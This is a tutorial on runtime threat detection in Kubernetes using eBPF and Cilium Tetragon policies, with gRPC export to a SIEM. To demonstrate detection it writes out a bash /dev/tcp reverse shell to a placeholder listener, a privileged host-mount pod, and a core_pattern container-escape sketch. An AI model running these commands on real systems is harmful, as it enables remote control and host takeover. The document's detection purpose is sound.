Real-time k8s Threat Detection with eBPF and Cilium Tetragon
The Observability Blind Spot in Containerized Environments
Traditional security monitoring in Kubernetes, often relying on sidecar containers or node-level agents using ptrace or auditd, faces inherent limitations. These user-space solutions introduce performance overhead, create a larger attack surface, and can be blinded by sophisticated attacks that manipulate syscalls or operate at a level below their instrumentation. For a senior engineer tasked with securing a production cluster, these limitations are not just theoretical; they represent a tangible risk.
The fundamental challenge is the semantic gap between the container runtime and the host kernel. User-space agents have an incomplete picture, while traditional kernel modules are brittle and pose a stability risk. This is where eBPF (extended Berkeley Packet Filter) fundamentally changes the game. By allowing us to run sandboxed programs directly within the Linux kernel, eBPF provides a performant, secure, and programmable way to observe every system call, network packet, and file operation without modifying kernel source code or loading unstable modules.
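To make that concrete, here is a tiny illustration of the raw mechanism, independent of Tetragon (assuming bpftrace is installed on a node): a one-line eBPF program that hooks the same kernel function we will later target with a TracingPolicy.
# Attach a kprobe to tcp_connect and print the calling process; Tetragon automates
# this kind of hook, adds Kubernetes identity to it, and filters in-kernel.
sudo bpftrace -e 'kprobe:tcp_connect { printf("%s (pid %d) -> tcp_connect\n", comm, pid); }'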
Cilium Tetragon builds on this foundation, providing a Kubernetes-native abstraction layer over eBPF. It allows us to define security and observability policies as Kubernetes Custom Resources (TracingPolicy), transforming a low-level, powerful technology into a manageable component of our cloud-native stack. This post is not an introduction to eBPF; it's a deep dive into using Tetragon to solve complex, real-world security challenges in a production environment.
We will focus on two specific, high-impact threat scenarios:
* Detecting a reverse shell: a shell process inside a container initiating an outbound TCP connection.
* Detecting a container escape attempt: a containerized process writing to sensitive host files such as /proc/sys/kernel/core_pattern.
Throughout, we will focus on production-grade implementation patterns, performance tuning, and integrating the resulting security signals into a broader monitoring ecosystem.
Prerequisite: Deploying Tetragon with a Production-Ready Configuration
We'll assume you have a running Kubernetes cluster. The standard Tetragon Helm chart installation is a good starting point, but for our purposes, we need a more tailored configuration. We'll enable the gRPC endpoint for external log shipping and ensure the agent is deployed as a DaemonSet on all relevant nodes.
# Add the Cilium Helm repository
helm repo add cilium https://helm.cilium.io/
# Install Tetragon with gRPC export enabled
helm install tetragon cilium/tetragon -n kube-system \
--set tetragon.export.grpc.enabled=true
This basic installation is sufficient for our examples. In a real-world scenario, you would further configure resource limits, node selectors, and potentially custom export configurations in your values.yaml. The key takeaway is that Tetragon agents are now running on each node, ready to enforce our TracingPolicy resources.
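For reference, here is a minimal sketch of such a values.yaml; the key names used below (tetragon.resources, the top-level nodeSelector) are assumptions and should be verified against `helm show values cilium/tetragon` for your chart version:
# Sketch only: confirm key names against the chart's values.yaml
cat > tetragon-values.yaml <<'EOF'
tetragon:
  resources:
    requests: { cpu: 100m, memory: 128Mi }
    limits:   { memory: 512Mi }
nodeSelector:
  kubernetes.io/os: linux
EOF
helm upgrade --install tetragon cilium/tetragon -n kube-system \
  --set tetragon.export.grpc.enabled=true \
  -f tetragon-values.yaml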
To observe the events generated by Tetragon, you can use the tetra CLI inside one of the agent pods. Find a Tetragon pod and stream its events:
# Find a tetragon pod name
TETRAGON_POD=$(kubectl get pods -n kube-system -l app.kubernetes.io/name=tetragon -o jsonpath='{.items[0].metadata.name}')
# Stream the JSON events
kubectl exec -it -n kube-system $TETRAGON_POD -c tetragon -- tetra getevents
Keep this command running in a separate terminal. It will be our window into the kernel's activity as we trigger our threat scenarios.
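Alternatively, the same events are written as JSON to the export-stdout container in each agent pod (typically enabled by default in the Helm chart), which is handy when you want a raw stream to pipe into other tools:
# Stream the exported JSON events from every Tetragon agent
kubectl logs -n kube-system -l app.kubernetes.io/name=tetragon -c export-stdout -f --prefix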
Production Pattern 1: Detecting a Reverse Shell with a `TracingPolicy`
A reverse shell is notoriously difficult to detect with traditional network firewalls, as it's an outbound connection, often over a common port like 443. However, at the kernel level, it has a distinct signature: a shell process (/bin/bash, /bin/sh, etc.) directly initiating a TCP socket connection. This is highly anomalous behavior.
Let's craft a TracingPolicy to detect exactly this pattern.
The Scenario: Launching the Attack
First, we deploy a simple pod that gives us an interactive bash shell to simulate the attack. Note that the /dev/tcp redirection used below is a bash feature, so a minimal busybox image will not work here.
attacker-pod.yaml
apiVersion: v1
kind: Pod
metadata:
  name: attacker-pod
  labels:
    app: attacker
spec:
  containers:
  - name: attacker
    image: ubuntu:22.04
    command: ["/bin/bash", "-c", "sleep 3600"]
Apply this manifest:
kubectl apply -f attacker-pod.yaml
Now, from a separate terminal, we'll act as the C2 server listening for the incoming connection:
# On your local machine or another server, listen on a port
nc -l -p 1337
Finally, execute the reverse shell from within the attacker-pod:
# Get a shell inside the pod
kubectl exec -it attacker-pod -- /bin/bash
# Inside the pod, connect back to your listener (replace <LISTENER_IP>)
# NOTE: For this to work from a typical k8s pod, <LISTENER_IP> must be publicly accessible
# or on a network reachable from the pod.
/bin/bash -i >& /dev/tcp/<LISTENER_IP>/1337 0>&1
This command redirects the shell's standard input, output, and error to a TCP socket connected to our listener. You should now have a remote shell on your nc listener.
The Detection Policy
Without a specific policy, Tetragon will report the process exec and exit events for the shell, but it won't observe the TCP connection, let alone flag the combination as malicious. We need to tell it what to look for. This TracingPolicy uses a kprobe on tcp_connect to inspect every attempt to initiate a TCP connection.
policy-reverse-shell.yaml
apiVersion: cilium.io/v1alpha1
kind: TracingPolicy
metadata:
  name: "detect-reverse-shell"
spec:
  kprobes:
  - call: "tcp_connect"
    return: false
    args:
    - index: 0
      type: "sock"
    selectors:
    - matchPIDs:
      - operator: "In"
        followForks: true
        isNamespacePID: true
        values:
        - 1
      matchBinaries:
      - operator: "In"
        values:
        - "/bin/bash"
        - "/bin/sh"
        - "/usr/bin/bash"
        - "/usr/bin/sh"
Let's break down this policy's advanced features:
* kprobes: We are attaching to a kernel function, tcp_connect, which sits on the path of every outbound TCP connection attempt. Hooking it gives us direct access to the kernel socket structure and a single, stable instrumentation point, regardless of how user space issued the connect() syscall.
* args: We are capturing the first argument (index: 0) of tcp_connect, which is a struct sock, the kernel data structure representing the socket.
* selectors: This is where the magic happens. We are filtering events inside the kernel, before they are ever sent to the user-space agent, which is critical for performance.
* matchPIDs: With followForks: true and isNamespacePID: true, we match processes that are descendants of PID 1 within their own PID namespace. This correctly scopes our search to processes running inside a container.
* matchBinaries: The core of our logic. We only care about tcp_connect calls originating from common shell binaries. This dramatically reduces noise.
* matchActions (not used here): selectors can also attach an enforcement action to a match. This policy is intentionally detection-only, but adding action: "Sigkill" (as we do in the next policy) would terminate the shell the instant it attempts the outbound connection.
Apply the policy:
kubectl apply -f policy-reverse-shell.yaml
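Before re-running the attack, it is worth confirming the policy was accepted by the API server and picked up by the agents:
# TracingPolicy is a cluster-scoped resource
kubectl get tracingpolicies
# Recent tetra versions can also list policies loaded by the agent (subcommand availability varies by version)
kubectl exec -n kube-system $TETRAGON_POD -c tetragon -- tetra tracingpolicy list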
Now, re-run the reverse shell attack. In your tetra getevents output, you will see a specific, actionable event.
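If the stream is noisy, you can scope tetra getevents to just the attacker pod (the --pods filter and compact output are available in recent tetra releases):
# Compact, human-readable view of events from the attacker pod only
kubectl exec -it -n kube-system $TETRAGON_POD -c tetragon -- \
  tetra getevents -o compact --pods attacker-pod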
Analyzing the Event
The output from tetra getevents will be a rich JSON object. Here is an annotated example of what you should see:
{
  "process_kprobe": {
    "process": {
      "pid": 31337,
      "uid": 0,
      "cwd": "/",
      "binary": "/bin/bash",
      "arguments": "-i",
      "pod": {
        "namespace": "default",
        "name": "attacker-pod",
        "container": { "id": "cri-o://...", "name": "attacker" }
      }
    },
    "parent": {
      "pid": 31300,
      "uid": 0,
      "binary": "/bin/bash"
    },
    "func_name": "tcp_connect",
    "args": [
      {
        "sock_arg": {
          "family": "AF_INET",
          "state": "TCP_SYN_SENT",
          "sport": 54321,
          "dport": 1337,
          "saddr": "10.0.1.123",
          "daddr": "<YOUR_LISTENER_IP>"
        }
      }
    ]
  },
  "node_name": "k8s-worker-1",
  "time": "2023-10-27T18:42:00.123Z"
}
This single event gives us everything we need for a high-fidelity alert:
* Who: process.binary is /bin/bash running in the attacker-pod in the default namespace.
* What: The func_name is tcp_connect.
* Where: The connection is from the pod's IP (saddr) to our listener IP (daddr) on port 1337 (dport).
This is not just a log entry; it's a verifiable security finding with full context, generated with minimal performance overhead.
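If the default stdout exporter is enabled, the same events are available as JSON on each agent's export-stdout container, which makes it easy to prototype the alert with jq. The field paths below mirror the event shown above:
# Minimal sketch of an alert extraction over the exported JSON stream
kubectl logs -n kube-system $TETRAGON_POD -c export-stdout --tail=100 | \
  jq -c 'select(.process_kprobe.func_name == "tcp_connect")
         | {pod: .process_kprobe.process.pod.name,
            binary: .process_kprobe.process.binary,
            dst: .process_kprobe.args[0].sock_arg.daddr,
            port: .process_kprobe.args[0].sock_arg.dport}'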
Production Pattern 2: Detecting Container Escape via Host File Access
A more sophisticated attack involves a compromised process inside a container attempting to access or modify sensitive files on the host node. This is a classic container escape pattern. A common technique is to manipulate /proc/sys/kernel/core_pattern, which can be exploited to achieve code execution on the host.
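To see why this file is such a high-value target, here is a sketch of the abuse path (the handler path is hypothetical): core_pattern can name a pipe handler that the kernel executes as root in the host context whenever any process dumps core.
# Hypothetical illustration: point core_pattern at an attacker-controlled handler,
# then force a core dump; the kernel runs the handler as root on the host.
echo '|/tmp/payload.sh' > /proc/sys/kernel/core_pattern
ulimit -c unlimited
sh -c 'kill -SEGV $$'   # the resulting core dump triggers /tmp/payload.sh on the host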
We will create a policy to detect any write attempts to sensitive host files from within a containerized process.
The Scenario: Attempting Host File Manipulation
For this, we need a privileged pod that can mount parts of the host's filesystem.
privileged-pod.yaml
apiVersion: v1
kind: Pod
metadata:
  name: privileged-pod
spec:
  containers:
  - name: privileged-container
    image: ubuntu:latest
    command: ["/bin/bash", "-c", "sleep 3600"]
    securityContext:
      privileged: true
    volumeMounts:
    - name: host-root
      mountPath: /host
  volumes:
  - name: host-root
    hostPath:
      path: /
Warning: Running privileged pods is a significant security risk. This manifest is for demonstration purposes only.
Apply the manifest and get a shell into the pod:
kubectl apply -f privileged-pod.yaml
kubectl exec -it privileged-pod -- /bin/bash
From inside the pod, attempt to tamper with sensitive host state:
# Inside the pod
echo "malicious content" > /host/etc/shadow.test
# core_pattern is a host-global sysctl, so a privileged pod can write it directly
echo "|/tmp/malicious-script" > /proc/sys/kernel/core_pattern
The Detection Policy
Our TracingPolicy will use a tracepoint on sys_enter_write, which fires every time the write() syscall is entered. We will filter these events based on the file path.
policy-host-file-access.yaml
apiVersion: cilium.io/v1alpha1
kind: TracingPolicy
metadata:
  name: "detect-host-file-access"
spec:
  tracepoints:
  - subsystem: "syscalls"
    event: "sys_enter_write"
    args:
    - index: 1
      type: "char_buf"
      sizeArgIndex: 2 # The size of the buffer is the 3rd argument to write()
    selectors:
    - matchArgs:
      - index: 4 # Tetragon adds a filename argument at index 4 for file-related syscalls
        operator: "Prefix"
        values:
        - "/etc/shadow"
        - "/etc/passwd"
        - "/proc/sys/kernel/core_pattern"
        - "/root/.ssh/authorized_keys"
      matchActions:
      - action: "Sigkill"
This policy introduces several new advanced concepts:
* tracepoints: Instead of a kprobe, we're using a tracepoint. Tracepoints are stable, well-defined hooks in the kernel, making them more reliable across kernel versions than kprobes on arbitrary functions.
* matchArgs: We are now filtering based on the arguments to the syscall.
* index: 4: This is a Tetragon-specific feature. For syscalls that operate on file descriptors, Tetragon resolves the fd to a filename and makes it available as an additional argument at index 4 for filtering.
operator: "Prefix": We are matching on any write to files starting with* these sensitive paths. This is more robust than an exact match.
* matchActions.action: "Sigkill": This is the most critical part. We are not just detecting; we are actively preventing. When this policy matches, Tetragon will send a SIGKILL signal to the offending process, terminating it immediately. This moves us from runtime detection to runtime enforcement.
Apply the policy:
kubectl apply -f policy-host-file-access.yaml
Analyzing the Event and Enforcement
Now, re-run the file write attempts from within the privileged-pod. The moment you execute the echo targeting core_pattern, your shell session will be terminated (Killed).
In your tetra getevents output, you will see an event like this:
{
  "process_tracepoint": {
    "process": {
      "pid": 45678,
      "uid": 0,
      "binary": "/usr/bin/bash",
      "pod": {
        "namespace": "default",
        "name": "privileged-pod",
        ...
      }
    },
    "subsys": "syscalls",
    "event": "sys_enter_write",
    "args": [
      { "fd_arg": { "fd": 1 } },
      { "bytes_arg": "|/tmp/malicious-script\n" },
      { "size_arg": 23 },
      null,
      { "file_arg": { "path": "/proc/sys/kernel/core_pattern" } }
    ],
    "action": "ACTION_KILL"
  },
  ...
}
Key takeaways from this event:
* The file_arg.path clearly shows the target file was /proc/sys/kernel/core_pattern.
* The bytes_arg shows the exact content being written.
* Most importantly, the action field is ACTION_KILL, confirming that our enforcement policy was triggered.
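As a quick sanity check that enforcement really happened, the kubectl exec session itself reflects the SIGKILL: the in-pod bash is the process performing the write (echo is a builtin), so the session drops and kubectl exec typically returns the signal-derived exit status:
# After the killed exec session returns control to your workstation:
echo $?   # typically 137, i.e. 128 + SIGKILL(9)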
Advanced Topic: Performance Tuning and Event Filtering
While eBPF is highly performant, tracing every syscall in a busy cluster can still generate a significant volume of data. The key to a scalable production deployment is aggressive in-kernel filtering.
Consider a policy that traces all file opens (sys_enter_openat). On a typical node, this could generate thousands of events per second.
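To ground that estimate for your own nodes, a quick way is to count the tracepoint hits directly with perf, assuming perf is installed (run it on the node itself or from a privileged debug pod):
# Count node-wide openat syscalls over ten seconds to estimate event volume
sudo perf stat -e 'syscalls:sys_enter_openat' -a -- sleep 10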
Inefficient Policy (AVOID):
# DO NOT USE IN PRODUCTION
spec:
  tracepoints:
  - subsystem: "syscalls"
    event: "sys_enter_openat"
This policy sends every openat event from the kernel to the user-space Tetragon agent for filtering. This is wasteful.
Efficient Policy (PREFERRED):
# PREFERRED PRODUCTION PATTERN
spec:
  tracepoints:
  - subsystem: "syscalls"
    event: "sys_enter_openat"
    selectors:
    - matchArgs:
      - index: 4 # The filename argument
        operator: "Equal"
        values:
        - "/etc/secrets/api-key.txt"
      matchNamespaces:
      - namespace: "Pid"
        operator: "NotIn"
        values:
        - "host_ns"
This revised policy applies two filters at the eBPF level:
* matchArgs to report only opens of one specific sensitive file, /etc/secrets/api-key.txt.
* matchNamespaces to exclude events originating from the host PID namespace, effectively focusing only on containerized processes.
By pushing the filtering logic into the kernel, we reduce the data transfer and user-space processing by orders of magnitude. When writing policies, always ask: "Can this filter be applied in the kernel using selectors?"
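A complementary way to keep an eye on per-node event volume is Tetragon's own Prometheus metrics endpoint; the port (2112) and the events_total metric name below are assumptions that may differ by version, so check the chart values and the /metrics output:
# Inspect Tetragon's metrics to see how many events each node is emitting
kubectl port-forward -n kube-system $TETRAGON_POD 2112:2112 &
curl -s http://localhost:2112/metrics | grep -E 'tetragon.*events_total' | head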
Integrating with SIEM via gRPC
Observing events on the command line is useful for debugging, but a real security pipeline requires programmatic access. We enabled Tetragon's gRPC endpoint during installation for this purpose. Here is a Python script demonstrating how to connect to a Tetragon agent and stream events.
First, you need the protobuf definitions. You can fetch them from the Tetragon repository.
# You'll need grpcio-tools
pip install grpcio-tools
# Clone the Tetragon repo (or download the proto files)
git clone https://github.com/cilium/tetragon.git
# Generate the Python code
python -m grpc_tools.protoc -I ./tetragon/api/v1/tetragon/ \
    --python_out=. --grpc_python_out=. ./tetragon/api/v1/tetragon/tetragon.proto
Now, you can use this Python client to connect to the agent. You'll need to port-forward the Tetragon agent's gRPC port (54321) to your local machine.
# Find a tetragon pod
TETRAGON_POD=$(kubectl get pods -n kube-system -l app.kubernetes.io/name=tetragon -o jsonpath='{.items[0].metadata.name}')
# Port forward the gRPC service
kubectl port-forward -n kube-system $TETRAGON_POD 54321:54321
grpc_client.py
import grpc
import tetragon_pb2
import tetragon_pb2_grpc
from google.protobuf.json_format import MessageToJson

def run():
    # Connect to the gRPC server exposed via port-forward
    with grpc.insecure_channel('localhost:54321') as channel:
        stub = tetragon_pb2_grpc.FineGuidanceSensorsStub(channel)
        # Create a request to get all events
        # You can add filters here to reduce the stream from the server side
        request = tetragon_pb2.GetEventsRequest()
        print("Connecting to Tetragon gRPC stream...")
        try:
            responses = stub.GetEvents(request)
            for response in responses:
                # For this example, we just print the JSON representation
                # In a real system, you'd parse this and send it to a SIEM/alerting system
                # The response object can be one of several event types
                if response.HasField('process_kprobe'):
                    print("--- KPROBE EVENT ---")
                    print(MessageToJson(response.process_kprobe))
                elif response.HasField('process_tracepoint'):
                    print("--- TRACEPOINT EVENT ---")
                    print(MessageToJson(response.process_tracepoint))
                # Add other event types as needed (e.g., process_exec, process_exit)
        except grpc.RpcError as err:
            print(f"gRPC connection error: {err}")

if __name__ == '__main__':
    run()
This script establishes a persistent connection and streams events in real-time. In a production pipeline, this script would be the bridge between Tetragon and your SIEM (Splunk, Elastic) or alerting system (Alertmanager), allowing you to build dashboards, alerts, and long-term storage for forensic analysis based on these rich, kernel-level security signals.
Conclusion
By moving security observability from user-space into the kernel with eBPF, we gain a fundamentally more secure and performant foundation. Cilium Tetragon provides the necessary Kubernetes-native abstractions to make this power accessible and manageable.
We've moved beyond simple theory to implement specific, production-grade detection policies for high-stakes threats like reverse shells and container escapes. We've demonstrated not just detection but also active prevention using Sigkill. Furthermore, we've addressed the critical senior-level concern of performance by emphasizing in-kernel filtering and showcased how to complete the feedback loop by integrating with external systems via gRPC.
This approach represents a paradigm shift in cloud-native security. It is no longer about instrumenting applications or relying on coarse network policies alone. It's about achieving deep, tamper-resistant visibility into the very core of the system, providing the ground truth needed to detect and respond to the most sophisticated adversaries in our Kubernetes environments.